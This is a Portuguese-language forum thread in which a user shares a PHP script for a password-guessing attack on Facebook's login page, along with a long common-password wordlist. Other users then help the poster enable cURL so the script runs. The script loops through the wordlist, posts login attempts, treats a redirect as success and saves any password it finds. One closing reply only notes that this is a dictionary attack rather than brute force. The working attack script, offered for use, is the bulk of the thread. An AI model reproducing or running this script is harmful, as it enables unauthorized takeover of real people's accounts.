[Resolvido] Brute Force em PHP

[Gaw 5]

Estava procurando na net um SCRIPT Brute Force para me ajudar em um tópico Anterior ://forum.imasters.com.br/index.php?/topic/403028-gerador-continuo-de-senha/page__gopid__1580896 e me deparei com esse script:

 

<?php
function setData($email,$pass){
global $vars;
$vars["charset_test"]=urldecode("â¬,´,â¬,´,æ°´,Ð,Ð");
$vars["return_session"]=0;
$vars["email"]=$email;
$vars["pass"]=trim($pass);
$vars["persistent"]=1;
$vars["charset_test"]=urldecode("â¬,´,â¬,´,æ°´,Ð,Ð");
$vars["login"]="Login";

$data="";
foreach($vars as $key=>$value)
{
$data.=$key."=".urlencode($value)."&";
}
return $data;
}
set_time_limit(0);
ini_set('output_buffering',true);
$dictionary =dirname(__FILE__)."dic.txt";
function CheckItOut($email,$pass)
{
$ret=false;
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = setData($email,$pass);
$ch = curl_init('[url="https-~~-//login.facebook.com/login.php?login_attempt=1"]https-~~-//login.facebook.com/login.php?login_attempt=1[/url]');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_ENCODING , "gzip,deflate");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/cookie.txt');
$source=curl_exec($ch);

$info=curl_getinfo($ch);


if($info["redirect_count"]==1)
{
$ret=true;
}



return $ret;
}
echo "<form action="teste.php" method="post"><table align="center">
<tr><td colspan=2>Entry Email Address below to Bruteforce...</td>
</tr>

<tr><td>Email Address:</td>
<td><input type=text name="username" value=""></td></tr>
<tr><td>Click the Submit Button to Start..</td>
<td><input type="submit" value="Submit"></td></tr>
</table>";
if(isset($_POST['username']))
{

$username =$_POST['username'];
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..</br></br>";
sleep(3);
echo "Attack Started, brute forcing.. </br> ";
foreach($lines as $line)
{
$line=str_replace("r","",$line);
$line=str_replace("n","",$line);
if(CheckItOut($username,$line))
{
echo "[+] username:$username , password:$line - Password found : $line</br>";
$fp=fopen('cookie.txt','w');
fwrite($fp,'successfully pass:'.$line);
exit;
}else{
echo "[-] username:$username , password:$line - Password not found :$line</br>";
}
}
}
/**
* Print the result direct onto the browser screen...

ob_flush();
flush();
}
}
*/

?>

 

conteudo do dic.txt:

 

 

aaa

abc

academia

academic

access

ada

admin

adrian

adrianna

aerobics

airplane

albany

albatross

albert

alex

alexander

alf

algebra

alias

aliases

alice

alicia

alisa

alison

allison

alpha

alphabet

ama

amadeus

amanda

amber

amorphous

amy

analog

anchor

andrea

andromache

andy

angela

angerine

angie

animals

anita

ann

anna

anne

annette

answer

anthropogenic

anvils

anything

april

aria

ariadne

arlene

arrow

arthur

asd

asm

asshole

athena

atmosphere

aztecs

azure

bacchus

badass

bailey

banana

bananas

bandit

banks

barbara

barber

baritone

bart

bartman

basic

bass

bassoon

batch

batman

beach

beater

beauty

beaver

becky

beethoven

beloved

benz

beowulf

berkeley

berlin

berliner

beryl

beta

beth

betsie

betty

beverly

bicameral

bishop

bitch

bob

bradley

brandi

brandy

brenda

brian

bridget

broadway

bsd

bumbling

burgess

cad

camille

campanile

candi

candy

cantor

cardinal

caren

carla

carmen

carol

carole

carolina

caroline

carrie

carson

cascades

castle

cat

catherine

cathy

cayuga

cecily

celtics

cerulean

change

charity

charles

charming

charon

chat

chem

chemistry

chess

chester

christina

christine

christy

cigar

cindy

class

classic

claudia

cluster

clusters

code

coffee

coke

collins

commrades

computer

comrade

comrades

condo

condom

connect

connie

console

cookie

cooper

cornelius

couscous

create

creation

creosote

cretin

criminal

cristina

crystal

cshrc

cynthia

daemon

daisy

dana

dancer

daniel

danielle

danny

dapper

data

dave

dawn

deb

debbie

deborah

december

default

defoe

deluge

denise

desiree

desperate

develop

device

dial

diana

diane

diet

dieter

digital

disc

discovery

disk

disney

dog

dos

drought

dulce

duncan

eager

earth

easier

easy

eatme

edges

edinburgh

edwin

edwina

egghead

eiderdown

eileen

einstein

elaine

elanor

elephant

elizabeth

ellen

email

emerald

emily

emmanuel

enemy

engine

engineer

enterprise

enzyme

erenity

erica

erika

erin

ersatz

establish

estate

eternity

euclid

evelyn

extension

fairway

felicia

fender

fermat

ferrari

fidelity

field

file

finite

fishers

flakes

float

flower

flowers

foolproof

football

foresight

format

forsythe

fourier

fred

friend

frighten

fun

function

fungible

gabriel

games

gardner

garfield

gatt

gauss

george

gertrude

gibson

gina

ginger

glacier

gnu

golf

golfer

gorgeous

gorges

gosling

gouge

graham

grahm

group

gryphon

gucci

guess

guest

guitar

gumption

guntis

hack

hacker

hal

hamlet

handily

happening

harmony

harold

harvey

hawaii

heather

hebrides

heidi

heinlein

hello

help

herbert

hiawatha

hibernia

hidden

holly

homework

honey

horse

horus

hutchins

hydrogen

ibm

imbroglio

imperial

include

ingres

ingress

ingrid

inna

innocuous

internet

irene

irishman

isis

jackie

jane

janet

janice

janie

japan

jasmin

jean

jeanne

jen

jenni

jennifer

jenny

jessica

jester

jill

jixian

joanne

jody

johnny

joseph

joshua

joy

joyce

judith

judy

juggle

julia

julie

june

jupiter

karen

karie

karina

kate

kathleen

kathrine

kathy

katina

katrina

kelly

keri

kermit

kernel

kerri

kerrie

kerry

key

kim

kimberly

kirkland

kitten

knight

krista

kristen

kristi

kristie

kristin

kristine

kristy

ladle

lambda

lamination

lana

lara

larkin

larry

laura

lazarus

leah

lebesgue

lee

leland

leroy

leslie

lewis

library

light

linda

lisa

lisp

liz

lock

lockout

lois

lori

lorin

lorraine

louis

love

lucy

lynn

lynne

macintosh

mack

maggot

magic

mail

maint

malcolm

malcom

manager

mara

marci

marcy

maria

marietta

mark

markus

marni

mars

marty

marvin

mary

master

math

maurice

meagan

megan

melissa

mellon

memory

mercury

merlin

mets

mgr

michael

michele

michelle

mickey

mike

minimum

minsky

mit

modem

mogul

moguls

monica

moose

morley

mouse

mozart

mutant

nagel

nancy

napoleon

nasa

nepenthe

neptune

ness

net

network

new

news

newton

next

nicole

nita

nobody

noreen

noxious

nuclear

nutrition

nyquist

oceanography

ocelot

office

olivetti

olivia

open

operator

oracle

orca

orwell

osiris

outlaw

oxford

pacific

pad

painless

pakistan

pam

pamela

paper

papers

pass

password

pat

patricia

patty

paula

pencil

penelope

penguin

penis

peoria

percolate

persimmon

persona

pete

peter

philip

phoenix

phone

pierre

pizza

plane

playboy

plover

pluto

plymouth

polly

polynomial

pondering

pork

porsche

poster

power

praise

precious

prelude

presto

prince

princeton

priv

private

privs

professor

profile

program

protect

protozoa

pub

public

pumpkin

puneet

puppet

qwerty

rabbit

rachel

rachelle

rachmaninoff

rainbow

raindrop

raleigh

random

rascal

reagan

really

rebecca

regional

remote

renee

rick

ripple

risc

rje

robin

robot

robotics

robyn

rochelle

rochester

rodent

rolex

romano

ronald

root

rose

rosebud

rosemary

roses

ruben

rules

ruth

sal

samantha

sandra

sandy

sara

sarah

saturn

saxon

scamper

scheme

school

scott

scotty

secret

security

sensor

serenity

service

sesame

---

shannon

sharc

shark

sharks

sharon

sheffield

sheldon

shell

sherri

shirley

shit

shiva

shivers

shuttle

signature

simon

simple

simpsons

singer

single

smile

smiles

smooch

smother

snatch

snoopy

soap

socrates

somebody

sondra

sonia

sonya

sossina

sparrows

spit

spring

springer

squires

stacey

staci

stacie

stacy

steph

stephanie

strangle

stratford

student

stuttgart

subway

success

summer

sun

super

superstage

superuser

support

supported

surfer

susan

susanne

susie

suzanne

suzie

swearer

sybil

symmetry

sys

sysadmin

system

tamara

tami

tamie

tammy

tangerine

tape

tara

target

tarragon

taylor

tech

telephone

temptation

tennis

terminal

test

thailand

theresa

tiffany

tiger

tina

toggle

tomato

topography

tortoise

toxic

toyota

traci

tracie

tracy

trails

transfer

trisha

trivial

trombone

tty

tubas

tuttle

umesh

unhappy

unicorn

unix

unknown

uranus

urchin

ursula

util

utility

uucp

valerie

vasant

venus

veronica

vertigo

vicky

village

virgin

virginia

visitor

wargames

warren

water

weenie

wendi

wendy

whatever

whatnot

whiting

whitney

wholesale

will

william

williamsburg

willie

wilma

winston

wisconsin

wizard

wombat

woodwind

word

work

wormwood

wyoming

xfer

xmodem

xyz

xyzzy

yaco

yang

yellowstone

yolanda

yosemite

zap

zimmerman

zmodem

 

 

mas aqui não funciona o script, da erro nessa linha:

 

$ch = curl_init('[url="https-~~-//login.facebook.com/login.php?login_attempt=1"]https-~~-//login.facebook.com/login.php?login_attempt=1[/url]');

 

Fatal error: Call to undefined function curl_init() in C:Program FilesEasyPHP5.3.0wwwscriptsteste.php on line 27.

 

Não sei se é proibido falar sobre isso, desculpem-me se for!

[AmareshinO 0]

Voce esta com a extensao CURL habilitada???? se nao estiver verifique se no php.ini ela esta habilitada!

[Gaw 5]

Como eu faço?

[AmareshinO 0]

vai no php_info() e verifica (CTRL+F) se existe o CURL... caso nao encontre nada quer dizer ke nao esta habilitada a extensao... ai você tem ke ir no php.ini e porcurar pela extensao CURL e tirar o simbolo de comentario da frente dela!!!

 

 

abraz!

[Gaw 5]

funcionou vlw!

[AmareshinO 0]

Ótimo!!! qualquer duvida, poste!!!

 

 

abraços!!!!

[Holt 1]

Usando aquela lista ali, já não é mais Brute Force, é "ataque de dicionário", que utiliza apenas coisas comumente usadas;

Ex:'1995','123','gabriel',leonardo'.

Ao contrário do Brute Force, que se utiliza de qualquer possibilidade possível dentro dos caracteres escolhidos;

Ex:'dFb8q@1L','baaahu19$','kZ6¬64'.